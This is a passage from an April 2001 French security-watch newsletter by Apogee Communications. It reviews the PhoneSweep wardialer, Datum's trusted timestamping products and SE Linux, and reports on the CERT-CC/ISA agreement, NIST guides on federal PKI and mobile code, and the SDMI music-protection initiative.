Veille Technologique Sécurité - cert devoteam
Veille Technologique Sécurité - cert devoteam
Veille Technologique Sécurité - cert devoteam
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
APOGEE Communications<br />
Rapport de<br />
Veiilllle Technollogiique Sécuriité<br />
N°33<br />
Avril 2001<br />
Les informations fournies dans ce document ont été collectées et compilées à partir de<br />
sources d'origines diverses et publiquement accessibles : mailing-lists, newsgroups, sites<br />
Web, ...<br />
Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis<br />
de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à <strong>cert</strong>ains<br />
thèmes sont validées à la date de la rédaction du document.<br />
Les symboles d’avertissement suivants seront éventuellement utilisés:<br />
Site dont la consultation est susceptible de générer directement ou indirectement,<br />
une attaque sur l’équipement de consultation, voire de faire encourir un risque sur<br />
le système d’information associé.<br />
Site susceptible d’héberger des informations ou des programmes dont l’utilisation<br />
est répréhensible au titre de la Loi Française.<br />
Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la<br />
qualité des applets et autres ressources présentées au navigateur WEB.<br />
La diiffffusiion de ce documentt estt rresttrreiintte aux<br />
clliientts des serrviices<br />
VTS-RAPPORT ett VTS_ENTREPRIISE<br />
Les marques et les produits cités dans ce rapport sont la propriété des dépositaires respectifs.<br />
APOGEE Communications Pour tous renseignements<br />
1, Rue Jean Rostand Offre de veille: http://www.apogee-com.fr/veille<br />
91893 ORSAY CEDEX Informations: vts-info@apogee-com.fr<br />
© APOGEE Communications - Tous droits réservés
Avril 2001<br />
Au sommaire de ce rapport …<br />
PRODUITS ET TECHNOLOGIES 5<br />
LES PRODUITS 5<br />
TÉLÉPHONIE 5<br />
PHONESWEEP V3.0 5<br />
NOTARISATION 6<br />
TRUSTED TIME 6<br />
LES TECHNOLOGIES 7<br />
SYSTÈMES D'EXPLOITATION 7<br />
LINUX SE 7<br />
INFORMATIONS ET LÉGISLATION 9<br />
LES INFORMATIONS 9<br />
CERT 9<br />
ACCORD CERT-CC/ISA ET GRATUITÉ DES SERVICES D'ALERTE 9<br />
GUIDES 9<br />
LES PKI FÉDÉRAUX AUX US 9<br />
LES CONTENUS DYNAMIQUES ET CODES MOBILES 10<br />
PROTECTION 11<br />
SDMI 11<br />
LA LÉGISLATION 12<br />
INFORMATIQUE ET LIBERTÉ 12<br />
LA CYBERSURVEILLANCE DES SALARIÉS DANS L'ENTREPRISE 12<br />
SIGNATURE ELECTRONIQUE 12<br />
PARUTION DU DECRET D'APPLICATION 12<br />
LOGICIELS LIBRES 13<br />
LES SERVICES DE BASE 13<br />
LES OUTILS 13<br />
NORMES ET STANDARDS 15<br />
LES PUBLICATIONS DE L'IETF 15<br />
LES RFC 15<br />
LES DRAFTS 15<br />
NOS COMMENTAIRES 20<br />
LES RFC 20<br />
RFC 3091 20<br />
RFC 3093 20<br />
LES DRAFTS 20<br />
DRAFT-MONTENEGRO-SUCV-00.TXT 20<br />
DRAFT-BOSE-SMTP-INTEGRITY-00 21<br />
ALERTES ET ATTAQUES 22<br />
ALERTES 22<br />
GUIDE DE LECTURE 22<br />
FORMAT DE LA PRÉSENTATION 23<br />
SYNTHÈSE MENSUELLE 23<br />
AVIS OFFICIELS 24<br />
AKOPIA 24<br />
ALCATEL 24<br />
BEA 24<br />
CISCO 24<br />
COMPAQ 25<br />
FTP 25<br />
GENE6 25<br />
HP 25<br />
IP FILTER 25<br />
IPLANET 25<br />
LINUX 26<br />
LINUX CALDERA 26<br />
LINUX DEBIAN 26<br />
LINUX REDHAT 26<br />
LOTUS/IBM 26<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 2/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
MICROSOFT 27<br />
NCM 27<br />
NETSCAPE 27<br />
NETSCREEN 27<br />
NTP 28<br />
PDG SOFTWARE 28<br />
PGP 28<br />
QUEST 28<br />
SAMBA 28<br />
SCO 28<br />
SUN 28<br />
WATCHGUARD 29<br />
ALERTES NON CONFIRMÉES 29<br />
AXENT 29<br />
BINTEC 29<br />
CA 29<br />
CFINGERD 29<br />
CISCO 29<br />
IBM 29<br />
IPLANET 29<br />
LIGHTWAVE 30<br />
MICROSOFT 30<br />
NETOPIA 30<br />
NETSCAPE 30<br />
ORACLE 30<br />
PGP 31<br />
QUALCOMM 31<br />
RAYTHEON 31<br />
SUN 31<br />
SYMANTEC 31<br />
TREND MICRO 32<br />
AUTRES INFORMATIONS 32<br />
REPRISES D'AVIS ET CORRECTIFS 32<br />
AUSCERT 32<br />
CERT 32<br />
CIAC 32<br />
COMPAQ 33<br />
FREEBSD 33<br />
HP 33<br />
IBM 33<br />
LINUX 33<br />
LINUX DEBIAN 34<br />
LINUX MANDRAKE 34<br />
LINUX REDHAT 34<br />
MICROSOFT 34<br />
MYSQL 34<br />
NETBSD 34<br />
NIPC 34<br />
OPENBSD 35<br />
SCO 35<br />
SGI 35<br />
VIRUS 35<br />
CODES D'EXPLOITATION 35<br />
FTP 35<br />
MICROSOFT 35<br />
BULLETINS ET NOTES 35<br />
AXENT/SYMANTEC 36<br />
CERT 36<br />
CIAC 36<br />
IETF 36<br />
ISC/BIND 36<br />
LINUX REDHAT 37<br />
MCAFEE 37<br />
MICROSOFT 37<br />
SANS 37<br />
VERS LION 37<br />
VIGILANTE 37<br />
ATTAQUES 38<br />
OUTILS 38<br />
HARDENING WINDOWS 2000 38<br />
TECHNIQUES 40<br />
CHALLENGE ARGUS SYSTÈMS 40<br />
ADMMUTATE 40<br />
NTATTACK - HONEYNET SCAN OF THE MONTH 42<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 3/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Le mot de la rédaction …<br />
La vulnérabilité mise en évidence dans le service de gestion du temps NTP<br />
mérite d'être promue vulnérabilité du mois pour au moins deux bonnes raisons:<br />
- l'universalité du service déployé sur de nombreux serveurs et postes pour qui<br />
l'obtention d'une heure fiable est une nécessité,<br />
- la complexité de la mise en œuvre d'une attaque dont le code doit tenir en<br />
moins de 70 octets. Un tel code a pourtant vu le jour en environnement<br />
LINUX.<br />
Le défi du mois d'avril lancé par le projet "honeynet" nous a conduit à<br />
proposer une analyse détaillée (trop peut-être) permettant de suivre pas à pas<br />
les actions de deux pirates.<br />
Enfin, pour les lecteurs qui en auraient encore le courage, nous conseillons la<br />
lecture de l'excellente analyse du vers LION proposée par Max Vision sur<br />
son site WhiteHats.<br />
Bonne lecture …<br />
L'équipe de <strong>Veille</strong> <strong>Technologique</strong><br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 4/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
LES PRODUITS<br />
TELEPHONIE<br />
PHONESWEEP V3.0<br />
PRODUITS ET TECHNOLOGIES<br />
Description<br />
L'annonce de la disponibilité de la version 3.0 de PhoneSweep nous permet de revenir sur ce remarquable outil<br />
d'audit dont la première version avait été présentée dans notre rapport de Janvier 1999.<br />
La recherche automatique de systèmes<br />
informatiques accessibles depuis le réseau<br />
téléphonique est une activité pratiquée de<br />
longue date par les 'phreakers'. Le principe<br />
est simple : une liste de numéro téléphonique<br />
est automatiquement composée par un<br />
programme. Lorsqu’une tonalité correspondant<br />
à un équipement d’accès (modem, fax) est<br />
détectée, le numéro est enregistré pour<br />
utilisation ultérieure.<br />
La composition du numéro peut être réalisée<br />
par l’intermédiaire d’un modem ou par la<br />
génération des codes DTMF au moyen d’une<br />
carte son.<br />
La société SandStorm propose une version<br />
professionnelle de ces 'WarDialers' ayant pour<br />
objectif d’aider les sociétés à inventorier leurs<br />
accès téléphoniques et à identifier les<br />
équipements connectés derrière ceux-ci.<br />
La version 3.0 de PhoneSweep résulte d'une<br />
profonde réécriture de l'interface graphique de<br />
la version précédente offrant désormais un<br />
suivi en temps réel. L'extension des capacités<br />
du moteur d'identification des équipements<br />
autorise la reconnaissance de plus de 300<br />
matériels et logiciels !<br />
La technologie 'Single Call' permettant l'identification de l'utilisation de la ligne (Donnée et/ou Voix) et du type<br />
d'équipement distant (Modem, Fax, Nas, …) en un seul appel nécessite cependant l'utilisation d'un modem compatible<br />
et peut ne pas fonctionner dans <strong>cert</strong>ains pays. Aucune information n'est ainsi fournie quant à l'utilisation de ce produit<br />
avec un modem intégrant un mécanisme de 'brûlage des numéros'.<br />
PhoneSweep fonctionne en environnement Windows 95, 98, 2000 et NT4.0. La version 3.0 gère jusqu'à 12<br />
modems et 30000 numéros de téléphone sous réserve d'utiliser une configuration matérielle musclée: processeur<br />
cadencé à 600Mhz minimum et 128Mo de mémoire requis !<br />
Une fonction d'auto-test est présente qui permet de contrôler à tout instant le bon fonctionnement des modems en<br />
s'appuyant sur une liste de numéro d'accès fiables. Par ailleurs, une fonction d'attaque en force des identifiants et des<br />
mots de passe peut être activée après identification de l'équipement distant.<br />
Ce produit est parfaitement utilisable dans le cadre d'une stratégie de recensement et d'identification des<br />
équipements de communication de l'entreprise. Il offre un complément indispensable aux procédures d'inventaire<br />
manuelles car opérant par sondage actif des accès externes et internes.<br />
La concurrence dans ce domaine reste assez restreinte en dehors des multiples 'war dialers' ou 'tone dialers' qu'il<br />
conviendra de vérifier et d'adapter au contexte industriel. PhoneWall 20 de la société Sentry Telecom se positionne<br />
plus en tant que produit de protection actif équivalent d'un pare-feu et le produit d'audit téléphonique annoncé par la<br />
société ISS il y a maintenant plus d'un an n'a toujours pas vu le jour !<br />
Mentionnons la présence, sur le site de l'éditeur, d'un exemple de politique d'utilisation des modems au sein de<br />
l'entreprise dont la lecture est conseillée à tout responsable ayant à traiter ce problème.<br />
Complément d’information<br />
http://www.sandstorm.net/phonesweep/<br />
http://www.sentrytelecom.com/products/index.asp?b=2<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 5/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
NOTARISATION<br />
TRUSTED TIME<br />
Description<br />
Dans le monde des Infrastructures à Clé Publique (ICP ou encore IGC), le premier concept souvent présenté est<br />
celui du tiers de <strong>cert</strong>ification. Le concept de tiers notarial prend cependant toute son importance dans les<br />
environnements nécessitant la conservation d'une preuve: transactions financières, documents légaux, propriété<br />
intellectuelle, monde médical, …<br />
Il est alors nécessaire de pouvoir s'appuyer sur un temps 'fiable et garanti', un temps de référence. Un tel élement est<br />
fourni par un serveur dédié dit serveur d'horodatage ou TSS (TimeStamp Server), l'utilisation d'Autorités<br />
d'horodatage ou TSA (TimeStamping Authorities) permettant d'apposer l'élément de preuve utile à la non-répudiation<br />
d'un document.<br />
Ainsi, grâce aux <strong>cert</strong>ificats on sait le " qui " et le "quoi " et grâce au temps de confiance on connaît le "quand".<br />
Différents serveurs d'horodatage existent sur le marché qui se basent<br />
sur la référence de temps fournie par les organismes habilités. Mais<br />
dans l'horodatage, le niveau de confiance accordé à la source du temps<br />
est primordial et ce dernier doit être précis.<br />
La société Datum introduit la notion de confiance dans le temps avec<br />
son produit Trusted Time MasterClock (TMC). Celui-ci peut être<br />
utilisé afin de <strong>cert</strong>ifier et de tracer le temps depuis une source légale du<br />
temps UTC (Universal Coordinated Time) fournie par l'Institut de<br />
Mesure National de chaque pays, chaque Institut de Mesure National se<br />
synchronisant lui-même avec l'Institut de Mesure International, le BIPM<br />
(International Bureau of Weights and Measures) situé en France.<br />
Le Trusted Time MasterClock (TMC Rubidium-based) de Datum se<br />
Trusted Master Clock<br />
synchronise, après authentification mutuelle, avec l'Institut de Mesure<br />
NT Server (PCI Bus)<br />
National à travers le protocol DS/NTP (Datum Secure/Network Time<br />
Protocol). Le temps est <strong>cert</strong>ifié précis à 10 ms près par rapport à l'UTC.<br />
Certified Clock<br />
Les caractéristiques techniques du Trusted Time MasterClock (TMC)<br />
GPS Receiver<br />
sont les suivantes:<br />
- fournit le temps UTC (Coordinated Universal Time) <strong>cert</strong>ifié de<br />
l'Institut de Mesure National aux serveurs d'horodatage TSS,<br />
- supporte environ 200 serveurs d'horodatage TSS,<br />
- inclus une référence GPS pour l'initialisation et la supervision du TMC<br />
primaire,<br />
- fournit des journaux <strong>cert</strong>ifiés pour l'audit<br />
Le Trusted Time MasterClock transmet à son tour, après<br />
authentification mutuelle, ce temps UTC <strong>cert</strong>ifié au serveur d'horadatage<br />
Trusted Time StampServer (TSS). Le protocol DS/NTP, variation du<br />
protocole NTP (Network Time Protocol) fonctionnant sur TCP, est ici<br />
encore utilisé. Le temps est <strong>cert</strong>ifié précis à 100 ms près par rapport à<br />
l'UTC.<br />
Rubidium Oscillator<br />
I/O Read/Set<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 6/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE<br />
PCI<br />
Modem<br />
NTA<br />
(UTC Certification)<br />
Timing<br />
Engine<br />
Ethernet<br />
NIC<br />
Trusted<br />
Local Clocks<br />
Les caractéristiques du Trusted Time StampServer sont les suivantes:<br />
- "tamper resistant PCIv2.1"<br />
- carte prévue pour répondre au standard FIPS 140-1 L3<br />
- calcul cryptographique réalisé par un module conforme FIPS 140-1 L2<br />
- générateur pseudo-aléatoire conforme FIPS 140-1 L3<br />
- paramètres de configuration en mémoire non-volatile (Flash EPROM)<br />
- journaux d'audit, alarme<br />
- joue le rôle d'Autorité d'horodatage ou TSA (Time Stamp Authority)<br />
- suit les recommandations du document PKIX Time Stamp de l'IETF<br />
Ces deux produits répondent aux attentes et besoins exprimés dans le domaine des Infrastructures à Clé Publique<br />
(ICP ou IGC), et plus largement dans tout environnement nécessitant la génération d'une preuve horodatée. Notons<br />
cependant qu'en l'absence de jurisprudence, il est difficile de statuer sur la viabilité juridique de ces concepts et<br />
mécanismes.<br />
Complément d’information<br />
http://www.datum.com/tt/datasheet/TMasterClock_StampServer.htm<br />
http://www.datum.com/tt/index.htm<br />
ftp://ftp.nordu.net/internet-drafts/draft-ietf-pkix-time-stamp-14.txt
Avril 2001<br />
LES TECHNOLOGIES<br />
SYSTEMES D'EXPLOITATION<br />
LINUX SE<br />
Description<br />
'SE-LINUX' ou 'LINUX-SE', l'un des nombreux avatars du système LINUX, reste unique dans son<br />
genre. Linux Security Enhanced est en effet 'édité' et 'distribué' sous licence GPL (General Public<br />
License) par l'un des plus célèbre organisme du monde de la sécurité: la NSA.<br />
Un rapide historique permet de mieux comprendre la genèse de ce système d'exploitation et l'implication d'un<br />
organisme de défense.<br />
Le contrôle d'accès habituellement utilisé dans les dispositifs de sécurité s'il est adapté aux besoins courants de<br />
sécurité ne convient dans <strong>cert</strong>ains domaines dont le domaine militaire. En effet, le modèle utilisé, dit 'Modèle<br />
Discrétionnaire' repose principalement sur l'hypothèse que le créateur d'un objet - généralement une ressource de<br />
type fichier - dispose de tous les droits sur cette ressource. Les droits d'accès sont laissés à la discrétion du créateur<br />
qui peut ainsi volontairement, ou non, déclasser une information.<br />
A contrario, le 'Modèle Mandataire', ou plus largement, les modèles 'Modèles non discrétionnaires' séparent<br />
explicitement le domaine de l'utilisation d'une ressource de celui de la gestion des droits d'accès. L'utilisateur n'a ainsi<br />
plus aucune possibilité de manipuler les droits d'accès des ressources quand bien même les auraient-ils créées. Une<br />
politique de sécurité, plus ou moins flexible, dictera explicitement les opérations autorisées pour un sujet identifié sur<br />
un objet dûment référencé.<br />
Le modèle ce type le plus connu est probablement le modèle de contrôle d'accès de Bell-Lapaluda longtemps cité<br />
comme référence dans les environnements utilisant une classification à niveau d'habilitation. Un utilisateur du niveau<br />
X (ie: Secret) accédera à une ressource classifiée au même niveau en étant autorisé à créer* une ressource de<br />
niveau supérieur (ie: TopSecret). Notons à ce propos que les architectes du noyau du système Windows NT 3.1<br />
avaient annoncé en 1992 avoir conçu celui-ci dans l'optique de pouvoir obtenir une <strong>cert</strong>ification DoD au niveau B2,<br />
niveau imposant le support d'un modèle d'accès mandataire …<br />
En 1998, une équipe de 6 chercheurs de la NSA fait sensation durant la 21ième conférence du NISC en présentant<br />
un papier intitulé 'The Inevitability of Failure: The Flawed Assumption of Security in Modern Computing<br />
Environments' dans lequel le Modèle Discrétionnaire est mis à mal (cf. Rapport du mois de Janvier 1999).<br />
Cette prise de position conduit une équipe - constituée de deux chercheurs de la NSA, de trois membres de<br />
l'université de l'Utah et d'un chercheur de la société Secure Computing - à étudier une architecture système<br />
ouverte, flexible et apte à supporter un modèle de contrôle d'accès mandataire. Dénommée 'FLASK' pour ' FLux<br />
Advanced Security Kernel', cette architecture a fait l'objet d'un premier prototype utilisant un système d'exploitation<br />
de type micro-noyau dénommé FLUKE (FLUx Kernel Environnement). Les résultats démontrant la viabilité du modèle<br />
FLASK sont publiés lors de la conférence USENIX en Août 1999.<br />
Le modèle FLASK s'appuie ainsi sur une architecture comportant deux composantes:<br />
- Le gestionnaire d'objet (Object Manager) chargé de<br />
centraliser toutes les requêtes concernant la sécurité.<br />
- Le serveur de sécurité (Security Server) chargé de répondre<br />
aux requêtes transmises par le gestionnaire d'objet.<br />
Trois services sont mis à disposition du gestionnaire d'objet<br />
- Un service de validation chargé de prendre les décisions<br />
concernant les demandes d'autorisation d'accès, de labelisation<br />
des objets et de l'allocation en cas d'accès multiples.<br />
- Un service de notification informant de tout changement dans<br />
la politique de sécurité gérée par le serveur de sécurité,<br />
- Un service de cache (AVC ou Access Vector Cache) conservant<br />
les décisions prises par le serveur de sécurité. Slide 8 de la publication présentée à USENIX<br />
Face au succès du système LINUX et dans un but 'altruiste' -"to transfer the technology to a larger developer and<br />
user community" - la NSA engage l'intégration de FLASK au sein de cet environnement donnant naissance à la<br />
version Security Enhanced. Notons que la version courante de LINUX SE reste fortement limitée en terme de<br />
fonctionnalité, un important travail d'intégration restant à effectuer.<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 7/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
La NSA lance à ce sujet un appel à volontariat pour traiter les tâches suivantes dont:<br />
- L'intégration d'IPSEC avec un contrôle d'accès réseau mandataire,<br />
- L'intégration du contrôle d'accès mandataire dans NFS,<br />
- La simplification et amélioration du système de configuration des politiques de sécurité,<br />
- La réalisation des tests de conformité et de performance,<br />
- L'implémentation de l'ensemble contrôles d'accès mandataires décrit dans le document original,<br />
- L'implémentation de la polyinstanciation des répertoires et des ports,<br />
- L'intégration des mécanismes de notification,<br />
- L'intégration d'un système de fichier cryptographique avec contrôle d'accès mandataire,<br />
- L'implémentation des SID,<br />
- …<br />
En pratique, l'utilisateur final d'un système LINUX SE ne verra quasiment aucune différence à l'exception de<br />
l'apparition de la commande 'newrole' et de la modification du comportement de 12 utilitaires 'sensibles': 'chcon' ,<br />
'df' , 'find', 'id', 'install', 'killall', 'ls', 'mkdir', 'mknod', 'mkfifo', 'ps', 'pstree', 'runas' et 'tar'.<br />
Le développeur aura, lui, un travail de remise en cause conséquent, la version courante de Linux SE intégrant 50<br />
nouveaux appels systèmes acceptant pour la plupart un nouvel argument: le SID ou Security Identifier. Les<br />
exemples de programmation fournis avec la distribution permettent de se rendre compte de la complexité des<br />
nouveaux mécanismes d'autorisation.<br />
Linux SE est délivré sous la forme d'une distribution source complète de 31Mo contenant le Noyau 2.4.2 modifié,<br />
les utilitaires, les programmes de test et des exemples de politiques de sécurité. La documentation (1Mo) et les<br />
correctifs élémentaires ( 430Ko) dont ceux applicables aux noyaux 2.2.18 et 2.4.2 peuvent être téléchargés<br />
indépendamment.<br />
* propriété dite '*' permettant d'éviter le problème de la déclassification<br />
Complément d'information<br />
http://www-106.ibm.com/developerworks/library/s-selinux/?n-s-381<br />
http://www.cs.utah.edu/flux/fluke/html/flask.html<br />
http://www.nsa.gov/selinux/docs.html<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 8/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
LES INFORMATIONS<br />
CERT<br />
INFORMATIONS ET LEGISLATION<br />
ACCORD CERT-CC/ISA ET GRATUITE DES SERVICES D'ALERTE<br />
Description<br />
Le CERT-CC, organisme Américain financé sur fonds publics, a annoncé dernièrement sa collaboration avec un<br />
programme purement privé et commercial, l'Internet Security Alliance ou ISA. A la suite de la levée de boucliers<br />
de la part des utilisateurs dont beaucoup craignent que toutes les activités d'alerte et d'information ne deviennent<br />
purement mercantiles, la prise de position du CERT a fait 'La Une' des journaux.<br />
A ce jour, le libre accès aux informations ne semble<br />
pas être remis en cause, les participants au<br />
programme ISA ayant cependant le 'privilège' d'être<br />
informés en priorité (45 jours avant le grand public<br />
!) et de disposer d'un accès direct à la base de<br />
connaissance maintenue par le CERT-CC.<br />
La lecture des documents fournis par l'ISA démontre<br />
que le fond de commerce de l'ISA reste avant tout<br />
la base de connaissance du CERT-CC:<br />
"The operational concept to achieve these goals is<br />
based on the enormous store of data made available<br />
by the CERT/CC and the analytical expertise of its<br />
CERT® Analysis Center to harness this data for the<br />
benefit of ISA members. These centers have unmatched<br />
access to comprehensive data from their<br />
partners in both the public and private sectors."<br />
Plusieurs niveaux d'abonnement sont proposés, le<br />
niveau "SPONSORS" permettant de participer aux<br />
réunions plénières de l'ISA.<br />
Complément d'information<br />
http://www.<strong>cert</strong>.org/faq/<strong>cert</strong>cc_ISA.html<br />
http://www.theregister.co.uk/content/8/18493.html<br />
GUIDES<br />
LES PKI FEDERAUX AUX US<br />
Description<br />
Intitulé 'PKIs within the Federal government', ce document de 54 pages publié par le NIST a pour objectif<br />
d'assister les responsables des agences fédérales américaines dans leur choix d'infrastructure PKI. Il expose<br />
notamment les principes retenus pour assurer l'interconnexion des différents PKI fédéraux.<br />
Les problèmes abordés n'étant pas spécifiques des infrastructures gouvernementales, ce document constitue une<br />
excellente introduction à la problématique de l'interconnexion de PKI notamment pas la présence d'un préliminaire de<br />
plus de 26 pages entièrement consacré à la présentation des éléments techniques constitutifs de ceux-ci, des services<br />
associés et des risques dont il faut tenir compte.<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 9/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
La suite du document est consacré à l'infrastructure<br />
'Federal PKI' dont l'objectif est de fédérer les<br />
différentes Autorités de Certification ou AC<br />
indépendantes mises en place par les Agences Fédérales.<br />
Dans un tel contexte, la principale difficulté provient de<br />
la diversité des moyens utilisés par les agences dont<br />
<strong>cert</strong>aines ont fait appel à des Autorités de Certification<br />
commerciales.<br />
L'infrastructure 'Federal PKI' doit offrir un service<br />
permettant d'interconnecter les AC des Agences<br />
Fédérales par un chemin de <strong>cert</strong>ification fiable et de<br />
confiance.<br />
Ce service est normalement assuré par une passerelle<br />
spécialisée dite 'Bridge CA' ou BCA jouant le rôle d'un<br />
simple médiateur entre domaines de confiance.<br />
Il est important de noter qu'un BCA n'a pas à jouer le<br />
rôle d'une autorité de <strong>cert</strong>ification racine à partir de<br />
laquelle sont initialisés les chemins de <strong>cert</strong>ification.<br />
Les AC fédérales s'appuieront sur une passerelle située<br />
dans le domaine Fédéral, le FBCA ou Federal BCA,<br />
pour communiquer entre eux ou avec des AC situées en<br />
dehors de ce domaine. A cette fin, une cross <strong>cert</strong>ification<br />
sera effectuée entre les AC respectant un <strong>cert</strong>ain<br />
nombre de règles imposées et le FBCA.<br />
Ces règles prennent notamment la forme de profils mandataires ou optionnels, venant compléter ceux décrits dans le<br />
RFC2459 (PKIX Profile), et spécifiant les extensions dans les <strong>cert</strong>ificats (x509 version 3) et dans les CRL (version 2).<br />
Une démarche conduite en 7 étapes dont l'objectif est de faciliter le déploiement d'un PKI conforme aux exigences de<br />
l'infrastructure précitée est proposée en fin de document:<br />
1. Analyse des données et des applications de l'organisation susceptibles d'utiliser les services du PKI<br />
2. Etude des normes et des modèles génériques de politique mis à disposition<br />
3. Ecriture d'un premier jet de politique de <strong>cert</strong>ification en s'appuyant sur celle du FBCA<br />
4. Sélection d'un produit PKI ou d'un fournisseur de service<br />
5. Ecriture de la CPS (Certification Practice Statement ou Enoncé des Pratique de Certification ) dont une copie sera<br />
maintenue sur le BCA<br />
6. Réalisation d'un pilote sur une durée suffisante pour acquérir une expérience significative<br />
7. Interconnecter son PKI en demandant la cross-<strong>cert</strong>ification de l'AC avec le FBCA<br />
Les problèmes abordés n'étant pas spécifiques des infrastructures gouvernementales, nous recommandons la lecture<br />
de ce document qui constitue une excellente introduction à la problématique de l'interconnexion de PKI.<br />
Complément d’information<br />
http://csrc.nist.gov/publications/drafts.html<br />
http://csrc.nist.gov/pki/twg/y2000/papers/twg-00-18.xls<br />
http://csrc.nist.gov/pki/twg/y2000/doc_reg_00.htm<br />
LES CONTENUS DYNAMIQUES ET CODES MOBILES<br />
Description<br />
Intitulé 'Guidelines on Active Content and Mobile Code', ce guide de 45 pages publiée par le NIST propose un<br />
état de l'art des technologies ayant permis d'étendre les fonctionnalités initiales proposées par le WEB.<br />
Destiné à sensibiliser les personnels des Agences Fédérales Américaines, ce document ne propose aucune solution<br />
innovante que ce soit sur le plan technique ou organisationnel en dehors des traditionnelles mesures de prévention.<br />
Sa principale qualité réside donc dans l'utilisation d'une approche pédagogique trop rarement rencontrée: chaque<br />
élément vital de l'infrastructure - technologies clefs ou composants logiciels - fait l'objet d'un paragraphe détaillant<br />
non seulement la fonctionnalité associée mais aussi l'historique attaché à cet élément: son origine et les évolutions<br />
successives …<br />
Un important chapitre est ainsi réservé à la présentation de "l'anatomie" d'un navigateur et d'un serveur WEB en<br />
insistant, d'une part, sur les différentes méthodes d'activation d'un code par le navigateur,et d'autre part, sur les<br />
procédés de traitement spécifiques des pages dynamiques - SSI, ASP et servlet - par le serveur.<br />
Un second chapitre aborde les risques induits par les diverses technologies de présentation employées dont les<br />
langages de visualisation PostScript et PDF, les langages de programmation Java et VBScript, les composants<br />
autonomes Activ/X, le macro-langage VBA et enfin les applications externes telles ShockWave ou QuickTime.<br />
Cette approche permet de mieux comprendre - voire de justifier - les défaillances d'une infrastructure - The WEB -<br />
initialement conçue dans l'optique d'assurer un service élémentaire fiable et sécurisé mais ayant subit des<br />
modifications structurelles fondamentales désormais irréversibles.<br />
Tout en essayant d'avoir une approche positive, les auteurs insistent sur les nombreux facteurs endémiques qui<br />
continueront à favoriser l'insécurité de l'Internet en général, et des infrastructures WEB en particulier<br />
- Le facteur d'échelle conduisant à faire coexister les systèmes les plus solides car issus des dernières évolutions<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 10/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
technologiques avec des systèmes fragilisés par l'âge et l'obsolescence des logiciels utilisés. Ces derniers seront les<br />
cibles privilégiées des attaques car offrant des plates-formes aptes à relayer ces attaques au sein de<br />
l'infrastructure,<br />
- La difficulté d'appliquer des correctifs sur un système opérationnel conduisant à devoir laisser ouverte une<br />
fenêtre temporelle plus ou moins longue durant laquelle ce système est totalement vulnérable,<br />
- La diminution du niveau de qualité (et du contrôle de la qualité) des développements, la qualité n'étant plus un<br />
argument de vente mais plutôt un frein conduisant à retarder la mise sur le marché des produits. La présence quasi<br />
systématique de fonctions cachées tels les 'Easters Eggs' dans les produits les plus réputés tend à prouver que<br />
l'éditeur est en passe de perdre le contrôle de sa propre chaîne de production,<br />
- La confusion engendrée par les exigences de modularité et de flexibilité des constituants conduisant les<br />
développeurs à utiliser telles quelles, et sans précautions particulières, des technologies ne permettant plus de<br />
distinguer le programme des données,<br />
- La complexité grandissante des applications menant à un code de plus en plus volumineux et, par voie de<br />
conséquence, difficilement vérifiable,<br />
- Les trop nombreux paramètres de configuration devant être maîtrisés pour garantir un niveau de sécurité<br />
minimal,<br />
- L'absence d'éthique des sociétés collectant et archivant des données personnelles sur leurs sites WEB sans pour<br />
autant renforcer le niveau de sécurité de ceux-ci,<br />
- Les atteintes en déni de service engendrées par le raccordement, sur un réseau ouvert tel l'Internet, de<br />
composants dont les ressources ne sont pas illimitées.<br />
Complément d’information<br />
http://csrc.nist.gov/publications/drafts.html<br />
PROTECTION<br />
SDMI<br />
Description<br />
SDMI, acronyme de Secure Digital Music Initiative, résulte du regroupement des principaux acteurs dans le domaine<br />
de l'édition et de la publication musicale. L'objectif de cette initiative est de spécifier les bases d'un système de<br />
protection du contenu musical indépendamment de la forme du support, étant cependant entendu que celui-ci est<br />
digital !<br />
Le problème devant être prioritairement traité est celui de la diffusion d'un contenu sur un support autre que celui<br />
pour lequel il a été généré. En d'autres termes, le système de protection devra permettre de distinguer entre un<br />
contenu original et un contenu similaire mais ayant fait l'objet d'une manipulation visant par exemple à réduire le<br />
volume à transférer, la copie intégrale ('rip') d'un support original restant autorisée.<br />
Bien entendu, un tel système n'a de sens qu'à la condition que tous les dispositif permettant la restitution du<br />
contenu soient conformes aux spécifications SDMI. Cette conformité sera sanctionnée par le label DMAT<br />
(Digital Music Access technology).<br />
